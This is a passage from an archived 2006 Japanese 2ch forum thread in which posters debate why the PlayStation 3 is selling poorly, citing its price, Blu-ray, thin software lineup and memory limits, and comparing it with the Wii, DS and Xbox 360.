>>138
画質もなにも、ロクなゲーム出してませんぜ、旦那。
PSPだと、バイトヘルとか地味に楽しいの出してるが。

140 :名前は開発中のものです:2006/12/19(火) 08:23:16 ID:9/tjo7lU
逆に画質が良過ぎて、へぼモニタだとかえって汚い
HDMI対応じゃないとわけわからなくなるほど

141 :名前は開発中のものです:2006/12/19(火) 08:23:16 ID:hYhWXpZt
>>22
うれて100万

142 :名前は開発中のものです:2006/12/19(火) 09:02:30 ID:kVNLbDm7
画質がいいのは万歳なんだよ。
問題なのは価格だよ。

143 :じぇいど=かーてぃす:2006/12/19(火) 09:35:09 ID:a6sltjDX
くたらぎはだめだっ
た。
しろきものがかつんだ。
つよすぎる。
てもあしもでない。
いまたたかいはおわ
るのだろう
か?

144 :名前は開発中のものです:2006/12/19(火) 10:54:58 ID:ws77DszW
>>1>>7-9の分析が、広告やらイメージ戦略とか、いかにもソニー的な内容でワロチ。
物を売るためには、プレゼンやアピールも重要だけど、
PS3の失敗の原因は、そんな表層的なとこじゃないって。

PS3がここから盛り返す手立ては、ない。
Wiiとの差別化に徹するべきだが、その弾がない。
どのソフトメーカーもPS3のソフトなんて作りたくないor作れない、という状況にしてしまった。

「PS3ならTVで写真も見れちゃうんですね」なんて馬鹿なCMやってるのが、
PS3の現状、その状況を招いたソニーの無能っぷり、PS3の将来性のなさを顕著に表してるよ。
諦めた方がいい。

145 :名前は開発中のものです:2006/12/19(火) 14:02:43 ID:MoihBwYP
>>144ヒント
つ値段

146 :名前は開発中のものです:2006/12/19(火) 20:52:34 ID:9/tjo7lU
ソニータイマー標準装備なのがネックだな

147 :名前は開発中のものです:2006/12/19(火) 21:07:04 ID:v2RYyVpF
ブルーレイ搭載だから値段は下がりづらいし、妥当な値段だと思う。ただ、ブルーレイは多くの人が望んでないってこと。ブルーレイが元凶だよ。

148 :名前は開発中のものです:2006/12/19(火) 21:18:36 ID:8vPp86Sc
そないなことはないで。テレビもいずれは立派なハイビジョンだし
落ちる理由はWIIのほうがあるでよ。あほだなあ、自明の理だよ。

149 :名前は開発中のものです:2006/12/19(火) 21:23:36 ID:v2RYyVpF
>>148
でも気づけば次世代機の登場かもよ…。

150 :名前は開発中のものです:2006/12/19(火) 22:43:05 ID:Mf8MI+nq
ゲーム会社からしてみれば金かけ過ぎた商品を提供しなきゃいけないPS3なんてウンコ
しかも本体売れてないから、売れまくったとしても利益あがらねー。
少人数低予算でゲームつくれて市場が広いDSが一番いい

安く開発できるならPS3もいいと思うけど

151 :名前は開発中のものです:2006/12/20(水) 01:31:58 ID:fBDe0Y1T
>>144
N64は500万台、GCは400万弱を日本市場で売ったらしいが
PS3はお前のみたてじゃどのくらい売れると思ってるの?

有能なお前の見識をぜひとも披露してもらいたい。

152 :名前は開発中のものです:2006/12/20(水) 01:37:17 ID:OMKa7Cpe
あえてPS3で2Dゲーム出せば安く済むよ

153 :名前は開発中のものです:2006/12/20(水) 01:37:56 ID:OoPnaqxM
とりあえず、面白いソフトを一つ、なんとかして出せ 
できれば、まだなんとかなる 
できなきゃ終わり

154 :名前は開発中のものです:2006/12/20(水) 01:42:32 ID:OoPnaqxM
別にPS2レベルのゲームでもいい、無理して背伸びしなくてもいい 

とにかくPS2を早く片付けたいんだ置き場とコンセントの数が非常に困っている

155 :名前は開発中のものです:2006/12/20(水) 02:29:17 ID:KYrZA46n
PS3の購入者のうち、ブルーレイで映画みた奴
いったいどれくらいいるんだよ?w

ブルーレイいらんから2万5千円で売れよ。

156 :名前は開発中のものです:2006/12/20(水) 02:31:01 ID:Zrt6PUAJ
煽りとかじゃなく
超美麗なジャンピングフラッシュとかPS3コン対応のロコロコを何で出さないのかな?
RPGはローグで諦めついただろ?昔のゲームをリメイクとかのがいいと思うんだが

157 :名前は開発中のものです:2006/12/20(水) 02:37:37 ID:6t8NNYDW
>>156
次世代ハードまできて過去作品のリメイクですか?
だから魅力がねぇんだよゴミステはよ

158 :名前は開発中のものです:2006/12/20(水) 02:40:18 ID:WsClvBsp
>>155
BD排除したらただのPS2だよw
BDだからPS3なんだろ?
BDのソフト作れねぇじゃんw

159 :名前は開発中のものです:2006/12/20(水) 02:53:45 ID:Zrt6PUAJ
>>157
いやそんなに俺に吠えられても・・・・
現時点で魅力無いんだから
過去ファンを牽引した方がいいと思っただけなんだがね

160 :名前は開発中のものです:2006/12/20(水) 02:57:58 ID:6t8NNYDW
>>159
最近過去作品のリメイクで小遣い稼いでる探求力というかチャレンジ精神のない
大企業に辟易していた腹いせに暴言を吐いてしまった。申し訳ない。

161 :名前は開発中のものです:2006/12/20(水) 02:59:59 ID:NnLqyk4Z
任天堂のリメイクは綺麗なリメイク

162 :名前は開発中のものです:2006/12/20(水) 03:00:38 ID:jkulp7d4
>>153
発売日のまだわかってるバーチャ5でも2月ww
バイオFFメタルなどは少なくともその後

PS3が錆びる

163 :155:2006/12/20(水) 03:20:37 ID:KYrZA46n
>>158
そ、そ  う  だ っ た
( ̄□ ̄;)!!

164 :名前は開発中のものです:2006/12/20(水) 03:33:32 ID:Y4BLNfOK
ブルレイいらね
ムービー入れるくらいしか用途ないし

ここまで醜いとは思わなかったPS3
ヤバいヤバい言われてたから何か考えているんだろうと思っていたのに何も考えてなかったのか?

写真を見るってWiiでも出来るし
SD標準装備だし


165 :名前は開発中のものです:2006/12/20(水) 03:36:34 ID:+w2Vd6We
多分二年したらPS3トップだな

166 :名前は開発中のものです:2006/12/20(水) 03:56:51 ID:qzGRXB25
はいはいGK乙ですね

167 :名前は開発中のものです:2006/12/20(水) 04:31:36 ID:vM4oLXw8
とりあえず、値段と消費電力を下げて
GPUの性能とメモリの容量を上げろ。
話はそれから。

168 :名前は開発中のものです:2006/12/20(水) 04:37:19 ID:TTGZNO7h
単純にハード販売台数とソフトが少ないからだろ

普及すれば箱とウイーには勝てるよ

169 :名前は開発中のものです:2006/12/20(水) 04:54:27 ID:e/wblAH7
>>168
君は自分以外、バカだと思うタイプだね

170 :名前は開発中のものです:2006/12/20(水) 05:13:41 ID:9IPhDGoI
PS3、海外ソフトに面白そうなのあるけど、それじゃだめなの?

171 :名前は開発中のものです:2006/12/20(水) 05:17:16 ID:lWCaT0LG
>>168
まぁハードは普通に売ってるから、これからグラフィックの良さだけじゃない良質なソフトが出続ければな。
しかし勝てるかどうかは疑問だが…

172 :名前は開発中のものです:2006/12/20(水) 05:23:24 ID:+grRZ7Pw
 自分は今急いで買うつもりも無いが、
 168のいうことも間違いではないと思う。
 根拠はないんだけど最後は国内メーカが頑張る気がしてならない。
 高いから普及するかは問題だけど。。

173 :名前は開発中のものです:2006/12/20(水) 05:46:35 ID:lWCaT0LG
>>172
任天堂も国内メーカーだが?
あぁ箱○と比較しての話か。現在コアゲーマーと洋ゲー好きは箱○だろう。
とにかくPS3には起爆剤となるソフトが出てこないとな…

174 :名前は開発中のものです:2006/12/20(水) 06:34:43 ID:Vtg1VgFx
PS3でがんばれるメーカーなんて数社しかないだろ。
下手したらナムコとかは傾いてコナミと合併なんてありえるぞ

175 :名前は開発中のものです:2006/12/20(水) 06:37:46 ID:+RcgkRuw
でも買えないよ

176 :名前は開発中のものです:2006/12/20(水) 06:40:40 ID:NeQE8fUk
PS2の時でさえ体力削がれて疲弊していったメーカー続出なのに
PS3で戦っていけるんかしら

177 :名前は開発中のものです:2006/12/20(水) 12:17:20 ID:ODn44N/9
>174
ナムコは既に傾いてバンダイと合併してます。

178 :名前は開発中のものです:2006/12/20(水) 12:25:31 ID:x8p/2Nv2
週刊東洋経済2006.12、23中鉢社長インタビュー

【1台あたり販売比率をあげる】
一方、(利益に直結する)ソフトウェアでは、魅力的なソフトの充実を
急ぎ、本体1台あたりの販売本数比率を上げていく。
【セルはアイデア段階】
いろいろな事業本部でセルをまず触ってみて、アイデアを出そうと。今、
社内でそういう検討会議を進めています。
【とてもAV事業には使えない】
ただ課題はありますよ。セルチップがまだ高い。これを安くしないと、
とてもAV家電には使えない。あと消費電力の問題もある。
【セル投資はゲームで回収】
ただし、セルそのものに費やした開発投資及び設備投資は、あくまで
ゲーム事業で回収します。
【儲からなければ撤退】
だけど、歯をくいしばって頑張って頑張って、それでもどうしても儲
からないというなら、テレビでも何でも、それは撤退します。

オワタ(−人ー)

179 :名前は開発中のものです:2006/12/20(水) 12:32:29 ID:X5KGZDOG
どうして、PS3のゲームはカクカクチラチラばかりなんですか?


超高性能機じゃなかったんですかね?

180 :名前は開発中のものです:2006/12/20(水) 23:54:49 ID:vM4oLXw8
ソニックでも360にはない処理オチがあるし
やっぱり、メモリが足りないんじゃないの?
PS2の時もグラフィック関係のメモリが足りなかったし。

181 :名前は開発中のものです:2006/12/21(木) 01:56:02 ID:j932i5Rp
メモリだよねぇ
PS2の時学んだんじゃなかったのかな。
フルHDの時代が来るのはアナログ放送終わってからなんだから
無理して今出す必要なかったんじゃね?PS2でも十分戦えたと思うんだけど
2011年には360の後継機が出たりして・・・

182 :名前は開発中のものです:2006/12/21(木) 19:03:37 ID:0Lg+jaAG
PS3ってレースゲーばっかだな。発売予定も複数有るし。もっとジャンル増やせ。あ、本体が糞でレースゲーしか作れないんだったらスマン。

183 :名前は開発中のものです:2006/12/21(木) 19:20:49 ID:YY4EyKOx
>174ワロスw
君は半年ROMった方がいい。

184 :名前は開発中のものです:2006/12/21(木) 21:08:47 ID:S+YmYR05
>>155
漏れ漏れ

BD,SACDともいただきました


185 :名前は開発中のものです:2006/12/21(木) 21:27:40 ID:54oKugo2

ソニーはどこへ向かうのか
PS3の可能性と不透明な未来
http://www.nikkeibp.co.jp/style/biz/feature/tachibana/media/061221_ps3/

186 :名前は開発中のものです:2006/12/22(金) 05:15:50 ID:39NuxMkn
バーチャーファイター5 XBOX360で2007年夏発売
http://news19.2ch.net/test/read.cgi/gamenews/1166721101/l50

(ノ∀`)

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)